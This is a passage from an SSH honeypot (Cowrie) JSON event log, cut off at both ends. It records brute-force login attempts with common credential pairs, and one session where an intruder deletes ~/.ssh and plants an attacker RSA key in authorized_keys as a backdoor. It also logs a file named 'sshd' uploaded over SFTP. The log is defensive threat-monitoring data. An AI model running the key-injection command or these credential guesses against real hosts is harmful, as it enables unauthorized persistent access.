9@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:51:55.539260Z","src_ip":"212.227.235.229","session":"0dca74fd8250"}
{"eventid":"cowrie.login.success","username":"root","password":"combo@123","message":"login attempt [root/combo@123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:51:56.339616Z","src_ip":"212.227.235.229","session":"0dca74fd8250"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:51:56.809927Z","src_ip":"212.227.235.229","session":"0dca74fd8250"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:51:56.810599Z","src_ip":"212.227.235.229","session":"0dca74fd8250"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:51:56.811778Z","src_ip":"212.227.235.229","session":"0dca74fd8250"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:51:56.974997Z","src_ip":"212.227.235.229","session":"0dca74fd8250"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:51:57.357540Z","src_ip":"212.227.235.229","session":"0dca74fd8250"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T18:51:57.358374Z","src_ip":"212.227.235.229","session":"0dca74fd8250"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T18:51:57.553232Z","src_ip":"212.227.235.229","session":"0dca74fd8250"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:51:57.554074Z","src_ip":"212.227.235.229","session":"0dca74fd8250"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36564,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c15aa07c0ea","protocol":"ssh","message":"New connection: 212.227.235.229:36564 (1.2.3.4:22) [session: 5c15aa07c0ea]","sensor":"my-vps","timestamp":"2025-09-08T18:51:57.734885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:51:57.738487Z","src_ip":"212.227.235.229","session":"5c15aa07c0ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:51:57.943600Z","src_ip":"212.227.235.229","session":"5c15aa07c0ea"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T18:51:58.740237Z","src_ip":"212.227.235.229","session":"5c15aa07c0ea"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:51:59.969130Z","src_ip":"212.227.235.229","session":"5c15aa07c0ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36578,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b33828d8e32","protocol":"ssh","message":"New connection: 212.227.235.229:36578 (1.2.3.4:22) [session: 9b33828d8e32]","sensor":"my-vps","timestamp":"2025-09-08T18:52:00.136371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:52:00.148880Z","src_ip":"212.227.235.229","session":"9b33828d8e32"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:52:00.340801Z","src_ip":"212.227.235.229","session":"9b33828d8e32"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:52:01.143599Z","src_ip":"212.227.235.229","session":"9b33828d8e32"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:52:01.339963Z","src_ip":"212.227.235.229","session":"0dca74fd8250"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:52:01.341002Z","src_ip":"212.227.235.229","session":"9b33828d8e32"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":55170,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f1068feeef7","protocol":"ssh","message":"New connection: 170.64.157.139:55170 (1.2.3.4:22) [session: 1f1068feeef7]","sensor":"my-vps","timestamp":"2025-09-08T18:52:45.524905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:52:45.548439Z","src_ip":"170.64.157.139","session":"1f1068feeef7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:52:45.814698Z","src_ip":"170.64.157.139","session":"1f1068feeef7"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T18:52:46.974360Z","src_ip":"170.64.157.139","session":"1f1068feeef7"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:52:48.266338Z","src_ip":"170.64.157.139","session":"1f1068feeef7"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":45554,"dst_ip":"1.2.3.4","dst_port":22,"session":"6043644b1d26","protocol":"ssh","message":"New connection: 170.64.157.139:45554 (1.2.3.4:22) [session: 6043644b1d26]","sensor":"my-vps","timestamp":"2025-09-08T18:54:01.663533Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:54:01.665004Z","src_ip":"170.64.157.139","session":"6043644b1d26"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:54:01.994234Z","src_ip":"170.64.157.139","session":"6043644b1d26"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"654321","message":"login attempt [oracle/654321] failed","sensor":"my-vps","timestamp":"2025-09-08T18:54:03.089749Z","src_ip":"170.64.157.139","session":"6043644b1d26"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:54:04.418775Z","src_ip":"170.64.157.139","session":"6043644b1d26"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":57420,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd278cf8638d","protocol":"ssh","message":"New connection: 170.64.157.139:57420 (1.2.3.4:22) [session: bd278cf8638d]","sensor":"my-vps","timestamp":"2025-09-08T18:55:19.951599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:55:19.952718Z","src_ip":"170.64.157.139","session":"bd278cf8638d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:55:20.278596Z","src_ip":"170.64.157.139","session":"bd278cf8638d"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123","message":"login attempt [oracle/123] failed","sensor":"my-vps","timestamp":"2025-09-08T18:55:21.464194Z","src_ip":"170.64.157.139","session":"bd278cf8638d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:55:22.792571Z","src_ip":"170.64.157.139","session":"bd278cf8638d"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/5fda3b619f63547b7d23c749ca5e1a7de2a44d76348439d4d976dacd25f4798e","shasum":"5fda3b619f63547b7d23c749ca5e1a7de2a44d76348439d4d976dacd25f4798e","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/5fda3b619f63547b7d23c749ca5e1a7de2a44d76348439d4d976dacd25f4798e","sensor":"my-vps","timestamp":"2025-09-08T18:55:27.185933Z","src_ip":"212.227.125.160","session":"a12b956f343f"}
{"eventid":"cowrie.session.closed","duration":"308.0","message":"Connection lost after 308.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:55:27.186859Z","src_ip":"212.227.125.160","session":"a12b956f343f"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":53152,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff10c468189b","protocol":"ssh","message":"New connection: 170.64.157.139:53152 (1.2.3.4:22) [session: ff10c468189b]","sensor":"my-vps","timestamp":"2025-09-08T18:56:38.488368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:56:38.489398Z","src_ip":"170.64.157.139","session":"ff10c468189b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:56:38.741674Z","src_ip":"170.64.157.139","session":"ff10c468189b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"321","message":"login attempt [oracle/321] failed","sensor":"my-vps","timestamp":"2025-09-08T18:56:39.501413Z","src_ip":"170.64.157.139","session":"ff10c468189b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:56:40.755027Z","src_ip":"170.64.157.139","session":"ff10c468189b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60428,"dst_ip":"1.2.3.4","dst_port":22,"session":"15ef3df9cd68","protocol":"ssh","message":"New connection: 217.72.205.35:60428 (1.2.3.4:22) [session: 15ef3df9cd68]","sensor":"my-vps","timestamp":"2025-09-08T18:56:48.803944Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:56:48.805046Z","src_ip":"217.72.205.35","session":"15ef3df9cd68"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":53618,"dst_ip":"1.2.3.4","dst_port":22,"session":"247895a60a3b","protocol":"ssh","message":"New connection: 170.64.157.139:53618 (1.2.3.4:22) [session: 247895a60a3b]","sensor":"my-vps","timestamp":"2025-09-08T18:57:51.970582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:57:51.971496Z","src_ip":"170.64.157.139","session":"247895a60a3b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:57:52.232699Z","src_ip":"170.64.157.139","session":"247895a60a3b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"test","message":"login attempt [oracle/test] failed","sensor":"my-vps","timestamp":"2025-09-08T18:57:53.063372Z","src_ip":"170.64.157.139","session":"247895a60a3b"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:57:54.327459Z","src_ip":"170.64.157.139","session":"247895a60a3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10622,"dst_ip":"1.2.3.4","dst_port":22,"session":"56175279fc28","protocol":"ssh","message":"New connection: 212.227.235.229:10622 (1.2.3.4:22) [session: 56175279fc28]","sensor":"my-vps","timestamp":"2025-09-08T18:57:55.326943Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:57:55.328218Z","src_ip":"212.227.235.229","session":"56175279fc28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10956,"dst_ip":"1.2.3.4","dst_port":22,"session":"8149846e5e51","protocol":"ssh","message":"New connection: 212.227.235.229:10956 (1.2.3.4:22) [session: 8149846e5e51]","sensor":"my-vps","timestamp":"2025-09-08T18:57:55.467278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:57:55.468234Z","src_ip":"212.227.235.229","session":"8149846e5e51"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh